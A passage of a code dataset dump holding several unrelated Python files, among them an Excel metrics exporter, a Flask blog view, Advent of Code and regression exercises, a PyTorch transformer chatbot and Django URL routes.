else:\n print(f\"Error: Object {df} is not a pandas DataFrame or Series.\")\n return list(metrics)\n\ndef create_metrics_mapping(dataframes):\n metrics_mapping = {}\n for df_name, df in dataframes.items():\n for metric in df.index:\n metrics_mapping[metric] = df_name\n return metrics_mapping\n\ndef fetch_selected_metrics(ticker, selected_metrics, dataframes, metrics_mapping, years):\n # Initialize DataFrame with ticker as index and metrics as columns\n data = pd.DataFrame(index=[ticker], columns=[f\"{metric}_{'TTM' if year == 0 else 2023 - year}\" for year in range(years) for metric in selected_metrics])\n for metric in selected_metrics:\n if metric in metrics_mapping:\n df_name = metrics_mapping[metric]\n df = dataframes[df_name]\n if metric in df.index:\n print(df.loc[metric])\n values = df.loc[metric].values\n values = np.concatenate([values[:1], values[2:]]) # Exclude the 2023 data\n for year in range(years):\n try:\n value = values[year] # Get the value for the specified year\n except IndexError:\n value = pd.NA # Fill with NA if the data for the year is not available\n\n # Define column name based on the year\n if year == 0:\n column_name = f\"{metric}_TTM\"\n else:\n 
column_name = f\"{metric}_{2023-year}\"\n \n # Check if the value is a number and greater than 1000\n if isinstance(value, (int, float)) and abs(value) > 100000:\n value /= 1e6 # Convert to millions\n elif isinstance(value, str): # Check if the value is a string\n try:\n value = float(value) # Try converting the string to a float\n if abs(value) > 100000:\n value /= 1e6 # Convert to millions\n except ValueError:\n pass # Ignore if the string cannot be converted to a float\n\n data.loc[ticker, column_name] = value # Store the value in the DataFrame\n else:\n for year in range(years):\n # Define column name based on the year\n if year == 0:\n column_name = f\"{metric}_TTM\"\n else:\n column_name = f\"{metric}_{2023-year}\"\n\n data.loc[ticker, column_name] = pd.NA # Fill with NA if the metric is not in the DataFrame\n else:\n for year in range(years):\n # Define column name based on the year\n if year == 0:\n column_name = f\"{metric}_TTM\"\n else:\n column_name = f\"{metric}_{2023-year}\"\n\n data.loc[ticker, column_name] = pd.NA # Fill with NA if the metric is not in the metrics_mapping\n return data.reset_index().rename(columns={'index': 'ticker'})\n\ndef set_cell_format(worksheet, data, column):\n col_letter = openpyxl.utils.cell.get_column_letter(data.columns.get_loc(column) + 1)\n if pd.api.types.is_numeric_dtype(data[column]) and (data[column] <= 1).all():\n for row_num in range(2, len(data) + 2):\n cell = worksheet.cell(row=row_num, column=data.columns.get_loc(column) + 1)\n cell.number_format = '0.00%'\n return worksheet\n\ndef autosize_column(worksheet, data, column):\n col_letter = openpyxl.utils.cell.get_column_letter(data.columns.get_loc(column) + 1)\n max_length = max(len(item) for item in data[column].astype(str))\n worksheet.column_dimensions[col_letter].width = max_length + 2\n return worksheet\n\ndef format_header_row(worksheet):\n for cell in worksheet[\"1:1\"]:\n cell.fill = openpyxl.styles.PatternFill(start_color=\"1F497D\", end_color=\"1F497D\", fill_type=\"solid\")\n cell.font = openpyxl.styles.Font(bold=True, color=\"FFFFFF\")\n if cell.value:\n cell.value = cell.value.title()\n return worksheet\n\ndef generate_excel(data, file_name='comparative_analysis.xlsx'):\n with pd.ExcelWriter(file_name, engine='openpyxl') as writer:\n data.to_excel(writer)\n worksheet = writer.sheets['Sheet1']\n for column in data.columns:\n if not pd.api.types.is_datetime64_any_dtype(data[column]):\n worksheet = set_cell_format(worksheet, data, column)\n worksheet = autosize_column(worksheet, data, column)\n worksheet = format_header_row(worksheet)\n writer.save()\n print(f'Data exported to {file_name}')\n","repo_name":"arnavj99/Bynd","sub_path":"data_processing_and_export.py","file_name":"data_processing_and_export.py","file_ext":"py","file_size_in_byte":5305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44191480095","text":"from flask import Blueprint\nfrom flask import render_template, request, flash, redirect, url_for\nfrom flask_login import login_required, current_user\nfrom website import db\nfrom .models import Post\n\nviews = Blueprint('views', __name__)\n\n@views.route('/')\n@views.route('/home')\ndef home():\n post = Post.query.all()\n return render_template('home.html', user=current_user, posts=post)\n # return render_template(\"home.html\" , user=current_user)\n\n@views.route('/create-post', methods=['GET', 'POST'])\n@login_required\ndef create_post():\n if request.method == 'POST':\n text = 
request.form.get('text')\n\n if len(text) < 1:\n flash('Post is too short!', category='error')\n else:\n post = Post(text=text, author=current_user.id)\n db.session.add(post)\n db.session.commit()\n flash('Post created!', category='success')\n return redirect(url_for('views.home'))\n return render_template(\"create_post.html\", user=current_user)","repo_name":"prince-johnson/Blog-Website","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23874109053","text":"def load_grid(grid):\n #f = open(\"/Users/Breee02/Documents/GitHub/aoc2021/day-9/9-1.txt\", \"r\")\n #f = open(\"/Users/Breee02/Documents/GitHub/aoc2021/day-9/test.txt\", \"r\")\n f = open(\"d:/Users/Robert/Documents/GitHub/Rvdb/AoC2021/aoc2021/day-11/puzzleinput.txt\", \"r\")\n #f = open(\"d:/Users/Robert/Documents/GitHub/Rvdb/AoC2021/aoc2021/day-11/test.txt\", \"r\")\n #f = open(\"d:/Users/Robert/Documents/GitHub/Rvdb/AoC2021/aoc2021/day-11/test2.txt\", \"r\")\n for line in f:\n grid.append(list(map(int,list(line.strip()))))\n\ndef print_grid(grid):\n for line in grid:\n print(''.join(map(str, line)))\n\ndef get_neighbour_cells(grid, org_x, org_y):\n neighbour_cells = []\n for y_delta in (-1,0,1):\n y = org_y + y_delta\n if 0 <= y and y < len(grid):\n for x_delta in (-1,0,1):\n x = org_x + x_delta\n if 0 <= x and x < len(grid[y]):\n #if not itself, then append to neighbour cells\n if (x, y) != (org_x, org_y):\n neighbour_cells.append((x, y))\n return neighbour_cells\n\ndef get_next_grid(grid,flash_count):\n from queue import Queue\n flashed = Queue()\n #every cell by +1\n for y in range(len(grid)):\n for x in range(len(grid[y])):\n grid[y][x] += 1\n if grid[y][x] > 9:\n flashed.put((x, y))\n \n #when anyone flashed, then find neighbours and add 1 \n while flashed.qsize() > 0:\n x, y = flashed.get()\n if grid[y][x] >9:\n flash_count += 1\n grid[y][x] = 0 #reset cell to 0\n \n for x_buren, y_buren in get_neighbour_cells(grid, x, y):\n if grid[ y_buren][x_buren] != 0:\n grid[ y_buren][x_buren] += 1\n if grid[ y_buren][x_buren] > 9:\n flashed.put((x_buren, y_buren))\n \n return (grid, flash_count)\n \n\n\ndef puzzel1(input):\n flash_count = 0\n for i in range(0, 100):\n input,flash_count = get_next_grid(input, flash_count)\n print(\"Itteration: %d - #flashes: %d\"% (i+1, flash_count))\n #print_grid(input)\n return flash_count\n\ndef puzzel2(input):\n for i in range(0, 800):\n flash_count=0\n input,flash_count = get_next_grid(input, flash_count)\n \n print(\"Itteration: \", i+1)\n #print_grid(input)\n \n if sum(sum(flashes) for flashes in input) == 0:\n print(f\"Synchronized: {i+1}\")\n break\n return i + 1\n\ninput=[]\nload_grid(input) \nprint_grid(input)\nprint(\"Anwser puzzel 1:\", puzzel1(input))\ninput=[]\nload_grid(input) \nprint_grid(input)\nprint(\"Anwser puzzel 2:\", puzzel2(input))","repo_name":"rvdbreemen/aoc2021","sub_path":"day-11/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70849401448","text":"import time\n\nfrom selenium.webdriver.common.by import By\n\nfrom web.test_selenium_work2.page.base_page import BasePage\n\n\nclass Contact(BasePage):\n _memberTable_td = \".member_colRight_memberTable_td\"#通讯录用户信息行\n _number = '//*[@id=\"js_contacts263\"]/div/div[2]/div/div[2]/div[1]/div[2]/span/span/span[2]'#人数\n _tb_member = 
\".member_colRight_memberTable_td_Checkbox\"#定位到列表行\n _checkbox = \".ww_checkbox\"#选择用户按钮\n _delete = \".js_delete\"#删除按钮\n _submit = \".qui_btn ww_btn ww_btn_Blue\"#确定按钮\n _cancel = \"确认\"#弹窗点击按钮元素\n\n def get_addmember(self):\n elements = self.finds(By.CSS_SELECTOR,self._memberTable_td)\n name_list =[element.get_attribute(\"title\") for element in elements]\n return name_list\n\n def get_number(self):\n number = self.find(By.XPATH,self._number).text\n return number\n\n def delete_member(self):\n #定位到checkbox元素位置\n self.finds(By.CSS_SELECTOR,self._tb_member)\n time.sleep(3)\n #定位到checkbox元素选项并点击\n self.find(By.CSS_SELECTOR,self._checkbox).click()\n time.sleep(3)\n #点击删除按钮\n self.find(By.CSS_SELECTOR,self._delete).click()\n #点击弹窗确认删除\n self.find(By.LINK_TEXT,self._cancel).click()\n time.sleep(3)\n #重新查表用于断言校验\n elements = self.finds(By.CSS_SELECTOR, self._memberTable_td)\n name_list = [element.get_attribute(\"title\") for element in elements]\n return name_list","repo_name":"jimmylinz/LagouProject","sub_path":"web/test_selenium_work2/page/contact_page.py","file_name":"contact_page.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73098251367","text":"# ---------- Import ----------\nimport sys\ninput = sys.stdin.readline\n\n# ---------- Function ----------\ndef similar(lst, lst_size):\n cnt = 0\n\n for start in range(lst_size - 1):\n for end in range(start + 1, lst_size):\n startUpper = sum(c.isupper() for c in lst[start])\n endUpper = sum(c.isupper() for c in lst[end])\n\n startTxt = ''.join(sorted(lst[start].upper()))\n endTxt = ''.join(sorted(lst[end].upper()))\n\n if startUpper == endUpper and startTxt == endTxt:\n cnt += 1\n\n return cnt\n\n# ---------- Main ----------\nT = int(input())\n\nfor _ in range(T):\n N, K = map(int, input().split())\n words = list(map(str, input().split()))\n\n print(similar(words, N))","repo_name":"miny-genie/BOJ","sub_path":"acmicpc_21980.py","file_name":"acmicpc_21980.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33444157961","text":"# libraries\nimport numpy as np\nimport scipy as sp\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# read data\ndf = pd.read_csv('data05_boston.csv')\n\n# simple linear regression\nfrom sklearn.linear_model import LinearRegression\nX = df[ ['lstat','age','rm'] ]\n#X = df[ ['lstat'] ] # Single row DataFrame\ny = df['medv'] # Series\n\nlm = LinearRegression()\nlm.fit(X,y) # Get beta-0 and beta-1: medv = b0 + b1*lstat\nlm.coef_ # coefficients\nlm.intercept_ # intercepter\n# Training Session is Done\n\nlm.predict(10)\nlm.predict([[5], [10], [15]]) # 3 by 1 2dim arr (matrix), not 1 by 3 [5,10,15]\nyhat = lm.predict(X) # prediction by using training set\nr2 = lm.score(X,y) # R2; Performance Measurement named R-Square\nrmse = np.sqrt(((y-yhat)**2).mean()) # error from training set\n# r2, rmse are TRAINING ERROR, so if you consider more inputs,\n# PERFORMANCE should be better\n\n\nplt.plot(X,y,'bo')\nplt.plot(X,yhat,'r',linewidth=2)\nplt.title('%s vs. Medv: %.2f' % ('lstat',r2))\nplt.show()\n\n# multiple linear regression\nX = df.iloc[:,0:13]\ny = df['medv']\nlm = LinearRegression()\nlm.fit(X,y)\nlm.coef_ # coefficients\nlm.intercept_ # intercepter\nyhat = lm.predict(X) # prediction\nr2 = lm.score(X,y) # R2\nrmse = np.sqrt(((y-yhat)**2).mean())\n\nplt.plot(yhat,y,'bo')\nplt.title('All vs. 
Medv: %.2f' % r2)\nplt.show()\n\n# Where is P value??????? what the f**k!!!\n# So we are introducing StatsModel\n\n# using StatsModel\nimport statsmodels.api as sm\nX = df.iloc[:,0:13]\n# While scikit-learn takes intercept in the default model,\n# statsmodels doesn't take it by default.\n# If you consider intercept, you should invoke 'add_constant()'\nX = sm.add_constant(X)\ny = df['medv']\n\n# Ordinary Least Squre\n# This is a sort of constructor\nf = sm.OLS(y,X)\nr = f.fit()\nr.summary()\n\nr.params\nr.pvalues\n\n# add a new variable\nplt.plot(df['lstat'],df['medv'],'bo')\nX = df[ ['lstat'] ]\nlstat2 = X['lstat']**2\nX['lstat2'] = lstat2\nX = sm.add_constant(X)\ny = df['medv']\nf = sm.OLS(y,X)\nr = f.fit()\nr.summary()\n\nX = df[ ['lstat','rm'] ]\nX['lstat_rm'] = X['lstat'] * X['rm']\nX = sm.add_constant(X)\ny = df['medv']\nf = sm.OLS(y,X)\nr = f.fit()\nr.summary()\n\n\n# training vs. test set\nnp.random.seed(1)\ntrain_idx = list(np.random.choice(np.arange(df.shape[0]),300,replace=False))\ntest_idx = list(set(np.arange(df.shape[0])).difference(train_idx))\ndftrain = df.iloc[train_idx,:]\ndftest = df.iloc[test_idx,:]\n\n# Removes inputs whose p-values are high\n# This describes HOW SIMPLER MODEL CAN REDUCE OVERFITTING ISSUE.\nxtrain = dftrain.iloc[:,[0,1,3,4,5,7,8,9,10,11,12]]\nytrain = dftrain['medv']\nxtest = dftest.iloc[:,[0,1,3,4,5,7,8,9,10,11,12]]\nytest = dftest['medv']\n\n# Alternatively,\n# Use all samples in both TRAINING and TEST\n# This causes the increase of TEST-SET RMSE\nxtrain = dftrain.iloc[:,:-1]\nytrain = dftrain['medv']\nxtest = dftest.iloc[:,:-1]\nytest = dftest['medv']\n\n\nlm = LinearRegression()\nlm.fit(xtrain,ytrain)\n\nyhat_train = lm.predict(xtrain)\nrmse_train = np.sqrt( ((ytrain-yhat_train)**2).mean() )\nr2_train = lm.score(xtrain,ytrain)\n\nyhat_test = lm.predict(xtest)\nrmse_test = np.sqrt( ((ytest-yhat_test)**2).mean() )\nr2_test = lm.score(xtest,ytest)\n\nprint(rmse_train,rmse_test)\n\n\n###########################################################\n# Practice Reference Code\n###########################################################\n\n# data01_iris.csv를 읽으시오. \n# Sepal Width ~ Sepal.Length + Petal.Length + Petal.Width 로 \n# 선형 회귀 분석을 수행하시오. 
\n# (1) R2와 RMSE 값은 얼마인가?\n# (2) 어떤 변수의 제곱항을 추가하였을 때, 가장 높은 R2를 갖는 것은 어느 변수인가?\n# (3) Sepal.Length와 Petal.Length의 interaction 항을 추가하였을 때, R2은 \n# 얼마인가?\n# (4) 범주형 변수 Sepcies를 포함��켜 선형 회귀 분석을 수행하시오.\nx = np.zeros(10)\nx[0:5] = 1\n\ndf = pd.read_csv('data01_iris.csv')\n\nX = df [['Sepal.Length', 'Petal.Length', 'Petal.Width']]\ny = df ['Sepal.Width']\n\nlm = LinearRegression()\nlm.fit(X, y)\nr2 = lm.score(X,y) # R2; Performance Measurement named R-Square\n\nyhat = lm.predict(X)\nrmse = np.sqrt(((y-yhat)**2).mean()) # error from training set\n\n\nr2_1storder = r2\n\nspln_2nd = df['Sepal.Length']**2\nptln_2nd = df['Petal.Length']**2\nptwd_2nd = df['Petal.Width']**2\n\nX = df [['Sepal.Length', 'Petal.Length', 'Petal.Width']]\nX['spln_2nd'] = spln_2nd\nlm = LinearRegression()\nlm.fit(X,y)\nr2 = lm.score(X,y)\n\nr2_spln2 = r2\n\nX = df [['Sepal.Length', 'Petal.Length', 'Petal.Width']]\nX['ptln_2nd'] = ptln_2nd\nlm = LinearRegression()\nlm.fit(X,y)\nr2 = lm.score(X,y)\n\nr2_ptln2 = r2\n\nX = df [['Sepal.Length', 'Petal.Length', 'Petal.Width']]\nX['ptwd_2nd'] = ptwd_2nd\nlm = LinearRegression()\nlm.fit(X,y)\nr2 = lm.score(X,y)\n\nr2_ptwd2 = r2\n\nprint(r2_1storder, r2_spln2, r2_ptln2, r2_ptwd2)\n\n\n\nsplnptln = X['Sepal.Length'] * X['Petal.Length']\n\nX = df [['Sepal.Length', 'Petal.Length', 'Petal.Width']]\nX['splnptln'] = splnptln\nlm = LinearRegression()\nlm.fit(X,y)\nr2 = lm.score(X,y)\n\nr2_inter = r2\n\nprint(r2_1storder, r2_spln2, r2_ptln2, r2_ptwd2, r2_inter)\n\n\nr2_org = r2\n\nseteff_idx = (df['Species'] == 'setosa')\nvrgeff_idx = (df['Species'] == 'virginica')\n\nX = df [['Sepal.Length', 'Petal.Length', 'Petal.Width']]\ny = df ['Sepal.Width']\n\nseteff_idx = seteff_idx.astype(int)\nvrgeff_idx = vrgeff_idx.astype(int)\n\nX['seteff'] = seteff_idx\nX['vrgeff'] = vrgeff_idx\n\nlm = LinearRegression()\nlm.fit(X,y)\nr2 = lm.score(X,y)\n\n\n\nX = sm.add_constant(X)\nf = sm.OLS(y,X)\nr = f.fit()\nr.summary()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# PLEASE DO NOT GO DOWN BEFORE YOU TRY BY YOURSELF\n\n###########################################################\n# Practice Reference Code\n###########################################################\n\n# practice\ndf = pd.read_csv('data01_iris.csv')\n\n# OLS\nX = df[['Sepal.Length','Petal.Length','Petal.Width']]\ny = df['Sepal.Width']\n\nlm = LinearRegression()\nlm.fit(X,y)\nlm.score(X,y)\n\nX = sm.add_constant(X)\nf = sm.OLS(y,X)\nf.fit().summary()\n\n\n# adding 2nd order term\nX = df[['Sepal.Length','Petal.Length','Petal.Width']]\ny = df['Sepal.Width']\nx1 = X['Petal.Width']**2\nX['PW2'] = x1\n\nX = sm.add_constant(X)\nf = sm.OLS(y,X)\nf.fit().summary()\n\n\n# adding interaction term\nX = df[['Sepal.Length','Petal.Length','Petal.Width']]\ny = df['Sepal.Width']\n\nx1 = X['Petal.Width']*X['Petal.Length']\nX['Inter'] = x1\n\nX = sm.add_constant(X)\nf = sm.OLS(y,X)\nr = f.fit()\nr.summary()\n\n\n# adding Species\nX = df[['Sepal.Length','Petal.Length','Petal.Width']]\n\nx1 = pd.Series(np.zeros(X.shape[0]))\nx1[ df['Species']=='setosa' ] = 1\n\nx2 = pd.Series(np.zeros(X.shape[0]))\nx2[ df['Species']=='virginica' ] = 1\n\nX['Species_setosa'] = x1\nX['Species_virginica'] = x2\ny = df['Sepal.Width']\n\nlm = LinearRegression()\nlm.fit(X,y)\nr2 = lm.score(X,y)\n\nX = sm.add_constant(X)\nf = sm.OLS(y,X)\nr = 
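# The Species indicator columns above are built by hand with boolean masks;
# pandas can derive equivalent dummies in one call. A hedged sketch (versicolor
# is left out as the baseline level, matching the manual setosa/virginica pair):
import pandas as pd

species = pd.Series(['setosa', 'virginica', 'versicolor'], name='Species')
dummies = pd.get_dummies(species, prefix='Species')[['Species_setosa', 'Species_virginica']]
print(dummies)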
f.fit()\nr.summary()\n\n\n\n\n\n\n\n\n","repo_name":"degru82/mlearn_visual","sub_path":"s01_stat/scripts_used/script05_linreg.py","file_name":"script05_linreg.py","file_ext":"py","file_size_in_byte":6746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3149918652","text":"# encoding: utf-8\nimport math\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torch.nn import LayerNorm, TransformerEncoder, TransformerDecoderLayer, TransformerDecoder\n\n\nclass ChatBot(nn.Transformer):\n\n def __init__(self, vocab_size, d_model: int = 512, nhead: int = 8, num_encoder_layers: int = 6,\n num_decoder_layers: int = 6, dim_feedforward: int = 2048, dropout: float = 0.1,\n activation: str = \"relu\", custom_encoder=None, custom_decoder=None):\n super(ChatBot, self).__init__()\n self.dropout = dropout\n self.position_encoder = PositionEmbedding(d_model=d_model, dropout=dropout, max_len=80)\n self.emb = nn.Embedding(vocab_size, d_model)\n\n if custom_encoder is not None:\n self.encoder = custom_encoder\n else:\n from torch.nn import TransformerEncoderLayer\n encoder_layer = TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout, activation)\n encoder_norm = LayerNorm(d_model)\n self.encoder = TransformerEncoder(encoder_layer, num_encoder_layers, encoder_norm)\n\n if custom_decoder is not None:\n self.decoder = custom_decoder\n else:\n decoder_layer = TransformerDecoderLayer(d_model, nhead, dim_feedforward, dropout, activation)\n decoder_norm = LayerNorm(d_model)\n self.decoder = TransformerDecoder(decoder_layer, num_decoder_layers, decoder_norm)\n\n self.d_model = d_model\n self.nhead = nhead\n self.pred = nn.Linear(d_model, vocab_size)\n self._reset_parameters()\n\n # 获取padding mask\n @staticmethod\n def get_pad_mask(seq, pad_idx):\n seq = seq.transpose(0, 1)\n mask = seq == pad_idx\n return mask\n\n @staticmethod\n def generate_square_subsequent_mask(dim=512, sz: int = 10):\n r\"\"\"Generate a square mask for the sequence. 
The masked positions are filled with float('-inf').\n Unmasked positions are filled with float(0.0).\n \"\"\"\n mask = (torch.triu(torch.ones(dim, sz, sz)) == 1).transpose(1, 2)\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))\n return mask.cuda()\n\n def forward(self, src, tgt, src_mask=None, tgt_mask=None, memory_mask=None, src_key_padding_mask=None,\n tgt_key_padding_mask=None, memory_key_padding_mask=None, pad_id=0):\n emb_src = self.emb(src)\n emb_tgt = self.emb(tgt)\n src_emb = self.position_encoder(emb_src)\n tgt_emb = self.position_encoder(emb_tgt)\n src_pad_mask = self.get_pad_mask(src, pad_id)\n tgt_pad_mask = self.get_pad_mask(tgt, pad_id)\n tgt_mask = self.generate_square_subsequent_mask(src.size(1) * self.nhead, tgt.size(0)) # heads=8\n memory = self.encoder(src_emb, src_key_padding_mask=src_pad_mask)\n output = self.decoder(tgt_emb, memory, tgt_mask=tgt_mask, tgt_key_padding_mask=tgt_pad_mask)\n pred = F.relu(self.pred(output))\n return pred\n\n @torch.no_grad()\n def predict(self, src, max_len, pad_id, cls_id, sep_id):\n emb_src = self.emb_src(src)\n src_emb = self.position_encoder(emb_src)\n src_pad_mask = self.get_pad_mask(src, pad_id)\n batch_size = src.size(1)\n stop_flag = [False] * batch_size\n memory = self.encoder(src_emb, src_key_padding_mask=src_pad_mask)\n tgt = torch.LongTensor([cls_id] * batch_size).unsqueeze(0).cuda() # [1, B]\n for idx in range(1, max_len + 1):\n bert_tgt = self.emb_tgt(tgt)\n tgt_emb = self.position_encoder(bert_tgt)\n tgt_mask = self.generate_square_subsequent_mask(src.size(1) * self.nhead, idx)\n output = self.decoder(tgt_emb, memory, tgt_mask=tgt_mask) # [1, B, E]\n pred = self.pred(output[-1, :, :]) # [B, V]\n next_token = torch.argmax(pred, -1).view(-1, 1)\n tgt = torch.cat([tgt, next_token], dim=0) # [S+1, B]\n for idx_, token_i in enumerate(next_token.squeeze(0)):\n if token_i == sep_id:\n stop_flag[idx_] = True\n if sum(stop_flag) == len(stop_flag):\n break\n return tgt\n\n\nclass PositionEmbedding(nn.Module):\n\n \"\"\"\n Position embedding for self-attention\n refer: https://pytorch.org/tutorials/beginner/transformer_tutorial.html\n\n d_model: word embedding size or output size of the self-attention blocks\n max_len: the max length of the input squeezec\n \"\"\"\n\n def __init__(self, d_model, dropout=0.5, max_len=100):\n super(PositionEmbedding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n pe = torch.zeros(max_len, d_model) # [max_len, d_model]\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1) # [1, max_len]\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0).transpose(0, 1)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + self.pe[:x.size(0), :]\n return self.dropout(x)\n","repo_name":"ITZWF/NLPS","sub_path":"ChatBotter/chatbot_model.py","file_name":"chatbot_model.py","file_ext":"py","file_size_in_byte":5238,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71233405609","text":"import math\n\ndef distance(point1, point2):\n acc = 0\n\n for i in range(len(point1)):\n acc += (float(point1[i]) - float(point2[i])) ** 2\n \n return math.sqrt(acc)\n\ndef nearest_neighbor(all_points, new_point):\n best_point = None\n best_distance = None\n\n for current_point in all_points:\n current_distance = distance(new_point, 
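# A standalone sketch of the causal mask built by generate_square_subsequent_mask
# in the ChatBot model above, without the extra heads*batch leading dimension the
# model adds: positions a token may not attend to are -inf, allowed ones are 0.0.
import torch

def causal_mask(sz: int) -> torch.Tensor:
    m = torch.triu(torch.ones(sz, sz), diagonal=1)  # 1s strictly above the diagonal
    return m.masked_fill(m == 1, float('-inf'))

print(causal_mask(4))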
current_point)\n\n if best_distance is None or current_distance < best_distance:\n best_distance = current_distance\n best_point = current_point\n \n return best_point","repo_name":"zbaklund/CS419","sub_path":"hw02/KD_Util.py","file_name":"KD_Util.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26159057025","text":"import bluetooth\nimport subprocess\n\nclass BluetoothComm:\n def __init__(self):\n self.server_socket=bluetooth.BluetoothSocket( bluetooth.RFCOMM )\n port = 1\n self.server_socket.bind((\"\",port))\n self.server_socket.listen(1)\n self.client_socket,address = self.server_socket.accept()\n print(\"Accepted connection from \",address)\n \n def read_comm(self):\n res = self.client_socket.recv(1024)\n if len(res):\n return res\n else:\n return None\n \n def send_comm(self, text):\n self.client_socket.send(text)","repo_name":"analysis230/RasPi-Measuring-Device","sub_path":"bluetoothConnection.py","file_name":"bluetoothConnection.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"6336603046","text":"from django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.views.generic import TemplateView\nfrom django.views import defaults as default_views\nfrom django.contrib.sitemaps.views import sitemap\n\nfrom .sitemaps import StaticViewSitemap\n\n\nsitemaps = {\n 'static': StaticViewSitemap,\n}\n\nurlpatterns = [\n # General\n url(r'^$', TemplateView.as_view(template_name='pages/home.html'), name='home'),\n\n # Error pages\n url(r'^denied/$', TemplateView.as_view(template_name='pages/denied.html'), name='denied'),\n url(r'^error/$', TemplateView.as_view(template_name='pages/error.html'), name='error'),\n\n # Redirects for talking to Reddit\n url(r'^reddit/', include('never_saiddit.reddit.urls', namespace='reddit')),\n\n # User management\n url(r'^', include('never_saiddit.core.urls', namespace='core')),\n url(r'^users/', include('never_saiddit.users.urls', namespace='users')),\n url(r'^accounts/', include('allauth.urls')),\n\n # Special root-level files\n url(r'^robots\\.txt', include('robots.urls')),\n url(r'^sitemap\\.xml$', sitemap, {'sitemaps': sitemaps},\n name='django.contrib.sitemaps.views.sitemap'),\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.DEBUG:\n # This allows the error pages to be debugged during development, just visit\n # these url in browser to see how these error pages look like.\n urlpatterns += [\n url(r'^400/$', default_views.bad_request, kwargs={'exception': Exception('Bad Request!')}),\n url(r'^403/$', default_views.permission_denied, kwargs={'exception': Exception('Permission Denied')}),\n url(r'^404/$', default_views.page_not_found, kwargs={'exception': Exception('Page not Found')}),\n url(r'^500/$', default_views.server_error),\n ]\n if 'debug_toolbar' in settings.INSTALLED_APPS:\n import debug_toolbar\n urlpatterns = [\n url(r'^__debug__/', include(debug_toolbar.urls)),\n ] + urlpatterns\n\n # Admin is only enabled in development. 
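# The linear scan in nearest_neighbor() above can be written with min() and a
# key function; an equivalent rewrite with a small usage example:
import math

def euclidean(p1, p2):
    return math.sqrt(sum((float(a) - float(b)) ** 2 for a, b in zip(p1, p2)))

points = [(0, 0), (3, 4), (1, 1)]
print(min(points, key=lambda p: euclidean(p, (2, 2))))  # -> (1, 1)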
Unneccesary security risk in prod\n url('admin', admin.site.urls),\n","repo_name":"Damgaard/Never-Saiddit","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29582832532","text":"import datetime\nfrom typing import List, Any\nimport arrow\nfrom dateutil.parser import parse\nfrom dateutil.rrule import rrule\nfrom dateutil.rrule import DAILY\nfrom dateutil import tz\nfrom apps.log_esquery.type_constants import type_index_set_string, type_index_set_list\nfrom apps.log_search.models import Scenario\nfrom apps.utils.function import map_if\n\n\nclass QueryIndexOptimizer(object):\n def __init__(\n self,\n indices: type_index_set_string,\n scenario_id: str,\n start_time: datetime = None,\n end_time: datetime = None,\n time_zone: str = None,\n use_time_range: bool = True,\n ):\n self._index: str = \"\"\n if not indices:\n return\n\n indices = indices.replace(\" \", \"\")\n result_table_id_list: List[str] = map_if(indices.split(\",\"))\n # 根据查询场景优化index\n if scenario_id in [Scenario.BKDATA, Scenario.LOG]:\n # 日志采集使用0时区区分index入库,数据平台使用服务器所在时区\n time_zone = \"GMT\" if scenario_id == Scenario.LOG else tz.gettz()\n result_table_id_list = self.index_filter(result_table_id_list, start_time, end_time, time_zone)\n\n if not use_time_range:\n result_table_id_list = []\n\n self._index = \",\".join(result_table_id_list)\n\n if not self._index:\n\n map_func_map = {\n Scenario.LOG: lambda x: f\"{x}_*\",\n Scenario.BKDATA: lambda x: f\"{x}_*\",\n Scenario.ES: lambda x: f\"{x}\",\n }\n result_table_id_list: List[str] = map_if(indices.split(\",\"), map_func_map.get(scenario_id))\n\n self._index = \",\".join(result_table_id_list)\n if scenario_id in [Scenario.LOG]:\n self._index = self._index.replace(\".\", \"_\")\n\n @property\n def index(self):\n return self._index\n\n def index_filter(\n self, result_table_id_list: type_index_set_list, start_time: datetime, end_time: datetime, time_zone: str\n ) -> List[str]:\n # BkData索引集优化\n final_index_list: list = []\n for x in result_table_id_list:\n a_index_list: list = self.index_time_filter(x, start_time, end_time, time_zone)\n final_index_list = final_index_list + a_index_list\n return final_index_list\n\n def index_time_filter(\n self, index: str, date_start: datetime, date_end: datetime, time_zone: str\n ) -> type_index_set_list:\n date_start = date_start.to(time_zone).strftime(\"%Y%m%d000000\")\n date_end = date_end.to(time_zone).strftime(\"%Y%m%d%H%M%S\")\n now: datetime = arrow.now(time_zone).naive\n if parse(date_end) > 